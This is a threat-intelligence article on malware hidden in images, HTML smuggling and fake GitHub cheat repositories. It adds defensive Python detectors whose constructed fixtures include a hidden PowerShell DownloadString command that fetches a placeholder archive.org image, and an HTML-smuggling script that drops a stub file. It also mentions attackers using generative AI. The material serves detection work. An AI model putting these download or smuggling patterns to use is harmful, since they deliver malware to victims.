Cybercriminals are using advanced techniques to deliver malware such as VIP Keylogger and 0bj3ctivity Stealer, hiding the malicious code inside images. The images are hosted on archive[.]org, and the attackers use a .NET loader to deliver the final payloads.
How the attack works:
Phishing email: The attacker first sends a phishing email posing as an invoice or purchase order. The victim is tricked into opening an attachment, which is often a Microsoft Excel file.
Exploiting a vulnerability: When the victim opens the Excel file, an Equation Editor flaw (CVE-2017-11882) is exploited to download a VBScript file.
PowerShell script: The VBScript then runs a PowerShell script that downloads a malicious image from archive[.]org. The image looks ordinary, but it conceals Base64-encoded malicious code.
Decoding and execution: The PowerShell script decodes the code embedded in the image and runs it as a .NET executable. This executable acts as a loader that installs the final malware on the system.
Payload delivery: The loader then installs VIP Keylogger or 0bj3ctivity Stealer on the victim's system, which steals sensitive information such as passwords, keystrokes, and personal data.
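Each link in that chain leaves a process-creation event behind, and the lineage is what a defender can key on: Equation Editor is an OLE server that should never spawn children, and a script host launching PowerShell to fetch an image file is not something an invoice needs. The following detection logic is an added example written for this page, not code from the original post or from the report it summarises. The events are constructed Sysmon-style (Event ID 1) records, the file names and the archive.org path are placeholders, and the rules assume only the parent/child and command-line fields shown.

```python
"""Process-lineage detection for the Excel -> Equation Editor -> VBScript -> PowerShell chain.

Added example by the editor, not code from the original post or the report it summarises.
The events are constructed Sysmon-style process-creation records, not real telemetry.
"""
import re

OFFICE_APPS = ("excel.exe", "winword.exe", "powerpnt.exe")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe")
# PowerShell download primitives, and URLs that end in an image extension.
DOWNLOAD_API = re.compile(
    r"DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\bcurl\b", re.I)
IMAGE_URL = re.compile(r"https?://[^\s'\"]+\.(?:jpe?g|png|gif|bmp)\b", re.I)

# Constructed sample: pids 200-500 are the exploitation chain; pid 600 is a benign Equation Editor launch.
# The archive.org path is a placeholder; the page names only the hosting platform.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmd": r'EXCEL.EXE "C:\Users\u\Downloads\invoice_4471.xls"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmd": "EQNEDT32.EXE -Embedding"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r"wscript.exe C:\Users\u\AppData\Local\Temp\inv.vbs"},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -c \"(New-Object Net.WebClient).DownloadString('https://archive.org/download/PLACEHOLDER/pic.jpg')\""},
    {"pid": 600, "ppid": 200, "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmd": "EQNEDT32.EXE -Embedding"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(event, by_pid):
    """Process names from the event's parent up to the root (cycle-safe)."""
    names, seen = [], set()
    cur = by_pid.get(event["ppid"])
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        names.append(basename(cur["image"]))
        cur = by_pid.get(cur["ppid"])
    return names


def detect(events):
    """Return (rule, pid, detail) tuples for events that match the chain's tell-tale steps."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = basename(e["image"])
        lineage = ancestry(e, by_pid)
        parent = lineage[0] if lineage else ""
        # Rule 1: Equation Editor spawning any child is abnormal (CVE-2017-11882 exploitation indicator).
        if parent == "eqnedt32.exe":
            alerts.append(("EQNEDT32_CHILD", e["pid"], f"{parent} -> {name}"))
        # Rule 2: a script host launching PowerShell that downloads an image file.
        if name == "powershell.exe" and parent in SCRIPT_HOSTS:
            url = IMAGE_URL.search(e["cmd"])
            if url and DOWNLOAD_API.search(e["cmd"]):
                alerts.append(("PS_IMAGE_DOWNLOAD", e["pid"], url.group(0)))
        # Rule 3: PowerShell anywhere beneath an Office application.
        if name == "powershell.exe" and any(n in OFFICE_APPS for n in lineage):
            alerts.append(("OFFICE_LINEAGE", e["pid"], " -> ".join(reversed(lineage)) + f" -> {name}"))
    return alerts


if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] pid={pid} {detail}")
```

Rule 1 fires on the child of Equation Editor, not on Equation Editor itself, so a user who genuinely inserts an equation (pid 600) produces no alert. Rules 2 and 3 overlap on purpose: the lineage rule still catches a variant that swaps the VBScript stage for something else, while the download rule catches the image fetch even when the Office parent has already exited and the ancestry cannot be rebuilt.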
This technique is effective because images are usually considered safe, by users and by security systems alike. When malware is hidden inside something that looks harmless, it is not easily detected, and hosting the image on a trusted platform like archive[.]org gives the attackers even more cover.
The .NET loader is the core of this attack. It conceals the malicious code and ensures that antivirus software does not detect it. The loader fetches and executes the final malware, which makes it a key part of the attack chain.
This attack is a prime example of how attackers use legitimate resources and clever tricks to hide their activity. It shows how even something as simple as an image can be weaponised to deliver malware. That is why our security measures need to become smarter and more advanced, so that such hidden threats can be detected.
These attacks begin with phishing emails disguised as invoices or purchase orders. Through these emails, victims are tricked into opening malicious attachments such as Microsoft Excel files. When the victim opens the file, the Equation Editor vulnerability (CVE-2017-11882) is exploited and a VBScript is downloaded.
The VBScript then runs a PowerShell script. This PowerShell script retrieves an image from the server in which Base64-encoded malicious code is hidden. Once the code in the image is decoded, a .NET executable runs, which in the final step installs VIP Keylogger.
VIP Keylogger operates silently on the victim's system and steals sensitive data such as keystrokes, passwords, and credentials.
This technique is quite sophisticated: the phishing emails are designed to give the victim the illusion of real invoices or purchase orders, and delivering the hidden payload through an image helps the attackers evade detection.
In a related campaign, malicious archive files are sent as quotation requests. These files lure victims into running a JavaScript file. As soon as the victim executes the JavaScript file, it launches another PowerShell script.
This PowerShell script then retrieves an image from the server that conceals Base64-encoded malicious code. When this code is decoded, 0bj3ctivity Stealer is deployed and silently installed on the victim's system.
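Both campaigns above share the same carrier: a syntactically valid image with a Base64-encoded executable tucked into it, which is exactly what an image decoder ignores and a scanner should not. The check below is an added example written for this page, not code from the original post or from the report; it looks for bytes after the image's end-of-image marker and for long Base64 runs that decode to a PE header. The PNG and JPEG skeletons and the "payload" (a zero-filled MZ stub) are constructed in memory, so nothing real is handled.

```python
"""Inspect an image file for a Base64-encoded executable hidden inside it.

Added example by the editor; not code from the original post or the report it summarises.
The images below are constructed in memory (minimal PNG/JPEG skeletons plus a fake PE stub).
"""
import base64
import re

PNG_SIG = b"\x89PNG\r\n\x1a\n"
PNG_IEND = b"\x00\x00\x00\x00IEND\xaeB`\x82"   # zero-length IEND chunk with its CRC
JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"
# A run of 200+ Base64-alphabet bytes, optionally padded.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")
MAGIC = {b"MZ": "PE executable", b"PK": "ZIP archive"}


def image_format(data):
    if data.startswith(PNG_SIG):
        return "png"
    if data.startswith(JPEG_SOI):
        return "jpeg"
    return None


def trailing_data(data, fmt):
    """Bytes after the first end-of-image marker; a clean file has none."""
    end = PNG_IEND if fmt == "png" else JPEG_EOI
    idx = data.find(end)
    return None if idx < 0 else data[idx + len(end):]


def decoded_payload_types(data):
    """Decode each long Base64 run and classify it by the magic bytes of the result."""
    types = []
    for m in B64_RUN.finditer(data):
        run = m.group(0)
        kind = "unknown"
        # The run may have swallowed a few leading alphabet bytes, so try all four alignments.
        for off in range(4):
            chunk = run[off:]
            chunk = chunk[: len(chunk) - len(chunk) % 4]
            try:
                blob = base64.b64decode(chunk, validate=True)
            except ValueError:
                continue
            if blob[:2] in MAGIC:
                kind = MAGIC[blob[:2]]
                break
        types.append(kind)
    return types


def inspect_image(data):
    fmt = image_format(data)
    if fmt is None:
        return {"format": None, "trailing_bytes": -1, "payload_types": [], "verdict": "not-an-image"}
    trailing = trailing_data(data, fmt)
    types = decoded_payload_types(data)
    # Suspicious if any run decodes to a known executable, the end marker is missing, or
    # more than a little slack follows the end marker.
    suspicious = any(t != "unknown" for t in types) or trailing is None or len(trailing) > 64
    return {"format": fmt, "trailing_bytes": -1 if trailing is None else len(trailing),
            "payload_types": types, "verdict": "suspicious" if suspicious else "clean"}


# Constructed samples: minimal valid skeletons, then the same skeletons with a fake PE appended.
CLEAN_PNG = PNG_SIG + b"\x00\x00\x00\x0dIHDR" + b"\x00" * 17 + PNG_IEND
CLEAN_JPEG = JPEG_SOI + b"\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 9 + JPEG_EOI
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 124 + b"PE\x00\x00" + b"\x00" * 196   # 328 bytes, not a real binary
PAYLOAD_B64 = base64.b64encode(FAKE_PE)                                    # 440 Base64 characters
WEAPONISED_PNG = CLEAN_PNG + PAYLOAD_B64
WEAPONISED_JPEG = CLEAN_JPEG + PAYLOAD_B64

if __name__ == "__main__":
    for label, blob in [("clean png", CLEAN_PNG), ("png+payload", WEAPONISED_PNG),
                        ("jpeg+payload", WEAPONISED_JPEG)]:
        print(label, inspect_image(blob))
```

Two caveats for anyone adapting this: a JPEG that embeds an EXIF thumbnail carries a second SOI/EOI pair inside its APP1 segment, so the first-marker search will report trailing data on a legitimate file unless you walk the segments properly; and a loader can just as easily store the payload inside an ancillary PNG chunk before IEND, which the trailing-data check misses but the Base64-run check still sees.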
0bj3ctivity Stealer's job is to steal sensitive user information such as passwords, login credentials, and other personal details. The stealer targets every kind of valuable data that attackers can turn into profit.
In this attack too, the attackers use JavaScript and PowerShell scripts to deliver the malicious payload through an image, which keeps the payload out of sight and helps it evade detection. The method gives attackers a high reward at low risk.
Both campaigns show that the use of malware kits is growing; these kits let attackers run sophisticated operations without high-level expertise. The kits give attackers ready-made solutions, so they can carry out their attacks easily without complex coding or deep knowledge.
Tools like VIP Keylogger have been seen to share functionality with Snake Keylogger and 404 Keylogger, which indicates that these malware tools may have a shared development base. In other words, they may all be the work of a single developer group or malware developer community that customises its tools for use in different attacks.
This means that malware development has become commoditised, and attackers no longer need highly specialised skills to execute advanced attacks. With pre-built malware kits they can quickly scale up their operations, which makes their attacks more effective and persistent.
Attackers are now also using HTML smuggling, through which they deliver malware such as XWorm RAT via AutoIt droppers. HTML smuggling is a technique in which malicious HTML files hide their payload inside legitimate-looking content so that it can easily evade detection.
In this technique, the attacker crafts HTML files so that the hidden malicious code is executed in the user's browser or on their system without the user noticing. XWorm RAT is a remote access trojan that gives attackers full control over the victim's system.
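The reason HTML smuggling gets past network controls is that nothing executable crosses the wire: the attachment carries an encoded blob and a few lines of JavaScript that reassemble it into a file in the browser. Those reassembly primitives are therefore what a mail gateway or sandbox can triage statically. The scanner below is an added example written for this page, not code from the original post or the report; it scores an HTML document on the presence of a large bare Base64 literal together with the browser APIs used to turn it into a download. Both HTML documents are constructed, and the "payload" is a zero-filled ZIP header stub rather than anything functional.

```python
"""Static triage of an HTML attachment for HTML-smuggling indicators.

Added example by the editor; not code from the original post or the report it summarises.
Both HTML documents are constructed; the 'payload' is a zero-filled ZIP-header stub, not malware.
"""
import base64
import re

# JavaScript primitives used to reassemble a blob inside the page and hand it to the user as a file.
INDICATORS = {
    "atob": re.compile(r"\batob\s*\(", re.I),
    "blob_ctor": re.compile(r"new\s+Blob\s*\(", re.I),
    "object_url": re.compile(r"URL\.createObjectURL\s*\(", re.I),
    "ms_save_blob": re.compile(r"msSaveOrOpenBlob", re.I),
    "download_attr": re.compile(r"\.download\s*=|\bdownload\s*=\s*['\"]", re.I),
    "auto_click": re.compile(r"\.click\s*\(\s*\)", re.I),
}
# A bare quoted Base64 literal of 500+ characters. Inline data: URIs do not match, because
# the quote is followed by "data:..." rather than directly by the Base64 body.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{500,}={0,2})['\"]")
MAGIC = {b"MZ": "PE", b"PK": "ZIP"}


def scan_html(html):
    """Return matched indicators, decoded blob summaries, and a verdict."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(html)]
    blobs = []
    for m in B64_LITERAL.finditer(html):
        literal = m.group(1)
        try:
            raw = base64.b64decode(literal, validate=True)
        except ValueError:
            continue
        blobs.append({"encoded_len": len(literal), "decoded_len": len(raw),
                      "kind": MAGIC.get(raw[:2], "other")})
    # Smuggling needs a blob, a way to materialise it, and a way to deliver it to the user.
    drops = {"blob_ctor", "ms_save_blob"} & set(hits)
    delivers = {"object_url", "download_attr", "auto_click"} & set(hits)
    if blobs and drops and delivers:
        verdict = "likely_smuggling"
    elif blobs or len(hits) >= 2:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"hits": hits, "blobs": blobs, "verdict": verdict}


# Constructed samples.
STUB_ZIP = b"PK\x03\x04" + b"\x00" * 500          # 504 bytes: ZIP local-header magic, zero body
SMUGGLING_HTML = """<html><body><p>Your quotation is ready.</p>
<script>
var b = "%s";
var bin = atob(b);
var arr = new Uint8Array(bin.length);
for (var i = 0; i < bin.length; i++) arr[i] = bin.charCodeAt(i);
var blob = new Blob([arr], {type: 'application/octet-stream'});
var a = document.createElement('a');
a.href = URL.createObjectURL(blob);
a.download = 'quotation.zip';
a.click();
</script></body></html>""" % base64.b64encode(STUB_ZIP).decode()

BENIGN_HTML = """<html><body><h1>Newsletter</h1>
<img src="data:image/png;base64,%s" alt="logo">
</body></html>""" % ("A" * 600)

if __name__ == "__main__":
    for label, doc in [("smuggling", SMUGGLING_HTML), ("benign", BENIGN_HTML)]:
        print(label, scan_html(doc))
```

The three-part verdict (blob present, a materialisation API, a delivery API) is deliberate: a page with only `atob` and a long literal may be an inlined font or an obfuscated but harmless script, so it lands in "suspicious" for a human to look at rather than being blocked outright. Real samples also split or XOR the literal, or build it from an array of fragments, which this regex will not see; when the static pass is inconclusive, the reliable signal is the file-creation event the browser emits when the blob is saved.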
Another notable trend is that attackers are now using Generative AI (GenAI) to generate HTML files automatically and scale their attacks. GenAI tools let attackers produce unique variations of their malicious files, which helps them avoid attribution: the pattern of each attack is so distinct that security systems struggle to identify it.
Using Generative AI lets attackers make their malware faster, smarter, and less predictable, which helps them spread their attacks effectively and avoid detection.
Threat actors are also creating fake GitHub repositories in which they advertise video game cheats and mods. These repositories target the gaming community, which routinely downloads game cheats and mods. The fake repositories are presented as legitimate and popular gaming tools so that users trust and download them without hesitation.
Inside these repositories, attackers distribute malware such as Lumma Stealer through .NET droppers. Lumma Stealer is an information stealer that takes sensitive data such as login credentials, bank details, and personal information from the victim's system.
The .NET droppers install the malware stealthily, so the user does not notice. When the victim downloads files from the fake repository, malicious code executes and installs Lumma Stealer. The technique specifically targets gaming communities because they frequently download cheats and mods.
In this way attackers target the gaming industry and distribute malware, possibly with the help of GenAI and automated malware kits. The approach lets attackers carry out low-effort, high-reward attacks.
In short, by using images, phishing emails, and advanced automation tools such as GenAI, cybercriminals are making their tactics considerably more sophisticated. Tools like GenAI let attackers generate and scale automatically, which makes their malicious campaigns more effective. These tools help them create customised malware, which makes the attacks harder to detect and mitigate.
By using phishing emails and malicious images, attackers deceive their targets easily, because they disguise themselves as legitimate sources such as invoices or game cheats. At the same time, readily available malware kits give even inexperienced attackers powerful tools with which they can launch effective campaigns without deep technical knowledge.
All of this makes it clear that cybersecurity measures need to be strengthened further. Organisations and individuals should adopt advanced detection mechanisms and stronger defence strategies, such as AI-based threat detection systems, multi-factor authentication, and user awareness training, so that these sophisticated attacks can be stopped before they succeed.